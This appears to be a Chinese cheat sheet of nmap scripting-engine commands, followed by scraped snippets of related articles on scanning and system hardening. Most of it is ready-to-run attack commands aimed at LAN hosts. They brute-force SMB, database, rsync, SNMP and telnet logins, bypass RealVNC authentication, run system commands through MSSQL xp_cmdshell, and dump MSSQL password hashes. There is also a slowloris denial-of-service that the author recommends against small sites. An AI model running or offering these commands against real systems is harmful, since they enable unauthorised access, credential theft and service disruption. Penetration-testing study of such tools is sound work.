nmap的高级扫描

  (1) nmap --script=auth 192.168.137.*

  负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令

  (2)nmap --script=brute 192.168.137.*

  提供暴力破解的方式  可对数据库,smb,snmp等进行简单密码的暴力猜解

  (3)nmap --script=default 192.168.137.* 或者 nmap -sC 192.168.137.*

  默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击

  (4)nmap --script=vuln 192.168.137.*

  检查是否存在常见漏洞

  (5)nmap -n -p445 --script=broadcast 192.168.137.4

  在局域网内探查更多服务开启状况

  检查vnc bypass

  nmap  --script=realvnc-auth-bypass 192.168.137.4

  (1)检查vnc认证方式

  nmap  --script=vnc-auth  192.168.137.4

  获取vnc信息

  nmap  --script=vnc-info  192.168.137.4

  (2)smb扫描:

  smb破解

  nmap  --script=smb-brute.nse 192.168.137.4

  smb字典破解

  nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4

  smb已知几个严重漏

  nmap  --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4

  查看共享目录

  nmap -p 445  --script smb-ls --script-args ‘share=e$,path=\,smbuser=test,smbpass=test’ 192.168.137.4

  查看会话

  nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4

  系统信息

  nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 192.168.137.4

  (3)Mssql扫描:

  猜解mssql用户名和密码

  nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4

  xp_cmdshell 执行命令

  nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4

  (4)dumphash值

  nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa  192.168.137.4

  扫描root空口令

  nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4

  列出所有mysql用户

  nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4

  (5)Oracle扫描:

  oracle sid扫描

  nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5

  oracle弱口令破解

  nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5

  (6)其他一些比较好用的脚本

  nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关

  nmap -p 873 --script rsync-brute --script-args ‘rsync-brute.module=www‘ 192.168.137.4  破解rsync

  nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解

  nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解

  nmap -sU --script snmp-brute 192.168.137.4            snmp破解

  nmap -sV --script=telnet-brute 192.168.137.4          telnet破解

  nmap --script=http-vuln-cve2010-0738 --script-args ‘http-vuln-cve2010-0738.paths={/path1/,/path2/}‘ <target>  jboss autopwn

  nmap --script=http-methods.nse 192.168.137.4 检查http方法

  nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻击,对于处理能力较小的站点还挺好用的 ‘half-HTTP‘ connections

  nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4

  nmap --script=smb-brute --script-args=userdb=/tmp/帐号字典.txt,passdb=/tmp/密码字典.txt IP地址 -p 445

时间: 2024-08-24 20:48:52

nmap的高级扫描的相关文章

nmap的高级扫描option【原创收集】

(1) nmap --script=auth 192.168.137.* 负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令 (2)nmap --script=brute 192.168.137.* 提供暴力破解的方式  可对数据库,smb,snmp等进行简单密码的暴力猜解 (3)nmap --script=default 192.168.137.* 或者 nmap -sC 192.168.137.* 默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击

nmap 高级扫描用法

nmap提供了四项基本功能(主机发现.端口扫描.服务与版本侦测.OS侦测)及丰富的脚本库.Nmap既能应用于简单的网络信息扫描,也能用在高级.复杂.特定的环境中:例如扫描互联网上大量的主机:绕开防火墙/IDS/IPS:扫描Web站点:扫描路由器等等. 简要回顾Nmap简单的扫描方式:全面扫描:nmap-T4 -A targetip 主机发现:nmap-T4 -sn targetip 端口扫描:nmap-T4 targetip 服务扫描:nmap-T4 -sV targetip 操作系统扫描:nm

★Kali信息收集★8.Nmap :端口扫描

★Kali信息收集~ 0.Httrack 网站复制机 http://www.cnblogs.com/dunitian/p/5061954.html ★Kali信息收集~ 1.Google Hacking + Github Hacking http://www.cnblogs.com/dunitian/p/5074765.html ★Kali信息收集~2.Whois :域名信息 http://www.cnblogs.com/dunitian/p/5074768.html ★Kali信息收集~3.子

nmap隐藏自己扫描

192.168.1.216是zombie僵尸,192.168.1.212是被扫描端 nmap -sn 192.168.1.0/24  扫描在线主机 nmap -Pn -sI 192.168.1.216 192.168.1.212    (-Pn隐藏自己,-sI idle scan) IDS只能检测到192.168.1.216对192.168.1.212的扫描,不能检测到nmap主机的扫描.

怎样用 WPScan,Nmap 和 Nikto 扫描和检查一个 WordPress 站点的安全性

数百万个网站用着 WordPress ,这当然是有原因的.WordPress 是众多内容管理系统中对开发者最友好的,本质上说你可以用它做任何事情.不幸的是,每天都有些吓人的报告说某个主要的网站被黑了,或者某个重要的数据库被泄露了之类的,吓得人一愣一愣的. 如果你还没有安装 WordPress ,可以看下下面的文章. 在基于 Debian 的系统上: 如何在 Ubuntu 上安装 WordPress 在基于 RPM 的系统上: 如何在 CentOS 上安装 WordPress 我之前的文章 如何安

nmap命令-----高级用法

探测主机存活常用方式 (1)-sP :进行ping扫描 打印出对ping扫描做出响应的主机,不做进一步测试(如端口扫描或者操作系统探测): 下面去扫描10.0.3.0/24这个网段的的主机 1 nmap -sP 10.0.3.0/24 这个命令可以用于探测局域网有哪些机器 1 2 3 4 5 6 7 8 9 10 11 [[email protected] ~]# nmap -sP 10.0.3.0/24 Starting Nmap 5.51 ( http://nmap.org ) at 201

十条nmap常用的扫描命令

NMap,也就是Network Mapper,是Linux下的网络扫描和嗅探工具包. nmap是在网络安全渗透测试中经常会用到的强大的扫描器.功能之强大,不言而喻.下面介绍一下它的几种扫描命令.具体的还是得靠大家自己学习,因为实在太强大了. 1) 获取远程主机的系统类型及开放端口 nmap -sS -P0 -sV -O <target> 这里的 < target > 可以是单一 IP, 或主机名,或域名,或子网 -sS TCP SYN 扫描 (又称半开放,或隐身扫描)-P0 允许你

linux安全---系统更新+弱口令检测工具+nmap扫描工具

1.添加yum及更新系统 a.更新设置: echo  "0 3 * * 6 yum -y  update" >>/var/spool/cron/root b.添加repo源也叫yum源 添加国内mirrors,提速: cd  /etc/yum.repos.d/ mv  ./*  /root/ wget http://mirrors.aliyun.com/repo/Centos-6.repo   ##下载阿里云yum源 yum  makecache  ##生成缓存 yum  

『安全工具』Nmap 强悍的端口扫描工具

作为时下流行的端口扫描工具,Nmap有因其扫描的隐密性有“端口扫描之王”之称 上图是黑客帝国(The Matrix)中崔妮蒂用Nmap等工具入侵发电站的能源管理系统 0x 01 Nmap介绍 Nmap是一款用于网络发现和安全审计的安全工具,常用于端口扫描. 用法: nmap [扫描类型] [参数] 目标IP 1. 扫描类型 -sT TCP 连接扫描,会在目标主机中记录大量的链接请求和错误信息 -sS SYN扫描,只完成三次握手前两次,很少有系统记入日志,默认使用,需要root(admin)权限